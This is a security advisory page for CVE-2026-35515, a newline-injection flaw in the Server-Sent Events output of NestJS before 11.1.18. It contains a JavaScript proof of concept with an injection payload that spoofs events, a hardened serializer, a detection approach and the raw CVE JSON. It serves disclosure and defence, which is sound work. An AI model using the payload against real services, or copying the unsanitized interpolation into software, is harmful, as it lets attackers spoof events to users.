Security Vulnerability Report
CVE-2026-35515 CVSS 6.1 MEDIUM

CVE-2026-35515

Published: 2026-04-07 16:16:28
Last Modified: 2026-04-17 20:36:10

Description

Nest is a framework for building scalable Node.js server-side applications. Prior to 11.1.18, SseStream._transform() interpolates message.type and message.id directly into Server-Sent Events text protocol output without sanitizing newline characters (\r, \n). Since the SSE protocol treats both \r and \n as field delimiters and \n\n as event boundaries, an attacker who can influence these fields through upstream data sources can inject arbitrary SSE events, spoof event types, and corrupt reconnection state. This vulnerability is fixed in 11.1.18.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:nestjs:nest:*:*:*:*:*:node.js:*:* - VULNERABLE
Nest < 11.1.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// Vulnerable concept in NestJS < 11.1.18
// This PoC demonstrates how injecting newlines in the 'id' field splits the SSE event.
const mockSseStream = {
  // Stand-in for the Transform stream's push(): write the chunk to stdout
  push(chunk) {
    process.stdout.write(chunk);
  },
  _transform(message, encoding, callback) {
    // Vulnerable logic: direct interpolation without sanitization
    const type = message.type || 'message';
    const id = message.id || '';
    const data = message.data;
    // Constructing the SSE payload
    // If id contains '\nevent: fake\ndata: pwned\n\n', it breaks the protocol
    let payload = `id: ${id}\nevent: ${type}\ndata: ${data}\n\n`;
    this.push(payload);
    callback();
  }
};

// Exploit payload simulation
const maliciousPayload = {
  id: 'legitimate-id\nevent: spoofed\ndata: Malicious Data Injected!\n\n',
  type: 'original',
  data: 'Original Data'
};

console.log('--- Output Generated by Vulnerable Stream ---');
mockSseStream._transform(maliciousPayload, null, () => {});

/* Output:
id: legitimate-id
event: spoofed
data: Malicious Data Injected!

event: original
data: Original Data

The client receives two events: one spoofed and one original.
*/
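The hardened form of the serializer above, as an added example that is not NestJS code and not part of the advisory: every SSE field is handled according to its role in the protocol (single-line fields have CR/LF stripped, multi-line data is emitted as one `data:` line per line, `retry` is checked to be an integer), and a minimal event-stream parser shows how many events a client would actually see. The helper names (`serializeEvent`, `serializeEventUnsafe`, `parseEvents`) and the `retry` field are this example's own; the `id`/`type`/`data` message shape follows the advisory description.

```javascript
// Added example: SSE serialization with field-level sanitization, plus a parser
// to check what a client would receive. Not NestJS's implementation.

// CR, LF and CRLF each terminate an SSE field; a blank line terminates an event.
const LINE_BREAK = /\r\n|\r|\n/g;

// id, event and retry are single-line fields: a line break inside them would
// start a new field or event. SSE has no escape syntax, so the breaks are removed.
function sanitizeSingleLineField(value) {
  return String(value).replace(LINE_BREAK, '');
}

// data may legitimately span lines; the protocol expects one "data:" line per
// line, which the client re-joins with LF.
function serializeData(data) {
  const text = typeof data === 'string' ? data : JSON.stringify(data);
  return text.split(LINE_BREAK).map(line => `data: ${line}\n`).join('');
}

// Hardened serializer: message fields can no longer inject new fields or events.
function serializeEvent(message) {
  let out = '';
  if (message.type !== undefined) out += `event: ${sanitizeSingleLineField(message.type)}\n`;
  if (message.id !== undefined) out += `id: ${sanitizeSingleLineField(message.id)}\n`;
  if (message.retry !== undefined) {
    const retry = Number(message.retry);
    if (!Number.isInteger(retry) || retry < 0) throw new TypeError('retry must be a non-negative integer');
    out += `retry: ${retry}\n`;
  }
  if (message.data !== undefined) out += serializeData(message.data);
  return out + '\n';
}

// The interpolation pattern from the PoC above, kept here only for comparison.
function serializeEventUnsafe(message) {
  return `id: ${message.id || ''}\nevent: ${message.type || 'message'}\ndata: ${message.data}\n\n`;
}

// Minimal event-stream parser (spec subset): comment lines are skipped, a blank
// line dispatches the buffered event when it carries data, and multiple "data:"
// lines are joined with LF.
function parseEvents(stream) {
  const events = [];
  let current = { data: [] };
  for (const line of stream.split(LINE_BREAK)) {
    if (line === '') {
      if (current.data.length > 0) {
        events.push({ ...current, data: current.data.join('\n') });
      }
      current = { data: [] };
      continue;
    }
    if (line.startsWith(':')) continue;
    const idx = line.indexOf(':');
    const field = idx === -1 ? line : line.slice(0, idx);
    let value = idx === -1 ? '' : line.slice(idx + 1);
    if (value.startsWith(' ')) value = value.slice(1);
    if (field === 'data') current.data.push(value);
    else if (field === 'event') current.event = value;
    else if (field === 'id') current.id = value;
    else if (field === 'retry') current.retry = value;
  }
  return events;
}

// Constructed message with the same line-break injection in `id` as the PoC.
const tamperedMessage = {
  id: 'legitimate-id\nevent: spoofed\ndata: Malicious Data Injected!\n\n',
  type: 'original',
  data: 'Original Data',
};

console.log('unsafe events seen by client:', parseEvents(serializeEventUnsafe(tamperedMessage)).length); // 2
console.log('hardened events seen by client:', parseEvents(serializeEvent(tamperedMessage)).length); // 1
```

Stripping rather than rejecting is a design choice: the SSE format has no escaping, so the only alternatives are to drop the line breaks or to refuse the message. A detection-minded check for an existing service is to run `parseEvents` over captured stream output and alert when one application message produces more than one client-side event.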

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35515", "sourceIdentifier": "[email protected]", "published": "2026-04-07T16:16:27.773", "lastModified": "2026-04-17T20:36:10.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nest is a framework for building scalable Node.js server-side applications. Prior to 11.1.18, SseStream._transform() interpolates message.type and message.id directly into Server-Sent Events text protocol output without sanitizing newline characters (\\r, \\n). Since the SSE protocol treats both \\r and \\n as field delimiters and \\n\\n as event boundaries, an attacker who can influence these fields through upstream data sources can inject arbitrary SSE events, spoof event types, and corrupt reconnection state. This vulnerability is fixed in 11.1.18."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nestjs:nest:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.1.18", "matchCriteriaId": "56CE7D95-5F6B-4065-B105-4B5C36682291"}]}]}], "references": [{"url": "https://github.com/nestjs/nest/security/advisories/GHSA-36xv-jgw5-4q75", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}